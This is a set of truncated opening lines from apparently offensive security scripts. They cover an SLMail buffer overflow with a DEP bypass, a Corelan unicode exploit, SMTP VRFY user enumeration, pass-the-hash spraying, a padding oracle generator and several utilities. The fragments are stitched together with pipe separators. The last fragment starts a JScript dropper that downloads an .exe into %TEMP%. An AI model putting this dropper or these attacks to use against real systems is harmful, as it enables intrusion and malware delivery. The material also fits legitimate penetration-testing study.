#!/usr/bin/python
#
# Padding Oracle test-cases generator.
# Mariusz B. / mgeeky, 2016
# v0.2
#
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
# of a target cryptosystem, by generating a set of test cases to feed the cryptosystem with.
#
# Script that takes from input an encoded cipher text, tries to detect applied encoding, decodes the cipher |
#!/usr/bin/python
#
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer.
# To use it:
# - firstly right click on request in BurpSuite
# - select "Copy as curl command"
# - then launch this script.
# As a result, you'll have a bit nicer curl command in your clipboard.
# |
#
# Classic & old SLMail 5.5 PASS stack-based buffer overflow revisited for DEP Bypass
# via ROP to ZwSetInformationProcess with `leave`-based stack pivoting.
# Not overcoming ASLR, tested on Windows XP SP3 English.
#
# After launching, hit: $ nc victim 4444
#
# Prepared for educational purposes, if someone wants to go through first DEP Bypasses on
# this particular vulnerability.
# |
#!/usr/bin/python
#
# Corelan.be Exploit Writing tutorial part 7. Unicode
# Example 1: r2 Studios Xion 1.0 121 build stack-based unicode overflow
#
# Example of unicode-compatible exploit.
# No ASLR compatible, no DEP either.
# Tested on Windows XP SP3.
# |
#!/usr/bin/python
import sys
import netaddr
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import sr1, IP, ICMP
PING_TIMEOUT = 3
IFACE='eth0' |
#!/usr/bin/python
#
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
#
import socket
import sys |
#!/bin/bash
#
# Quick info:
# - script that is running OpenVPN client in a loop, breaking out of it when
# the "Network is unreachable" message comes up
# - after each client termination it wipes out left tunnel interfaces (tap0, tap1, .., tapN)
# - also it kills all of the running OpenVPN clients, preventing consecutive logons.
#
# Some Background: |
#!/bin/bash
#
# Simple script converting nmap's greppable output into a
# printable per-host table with protocol, port, state and service
# columns in it.
#
#
# WARNING: |
#!/usr/bin/python
#
# Simple script intended to perform Carpet Bombing against list
# of provided machines using list of provided LSA Hashes (LM:NTLM).
# The basic idea with Pass-The-Hash attack is to get One hash and use it
# against One machine. The problem with this approach is not having information
# about which machine the hash could be applied to.
# To combat this issue - the below script was born.
# |
<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () { |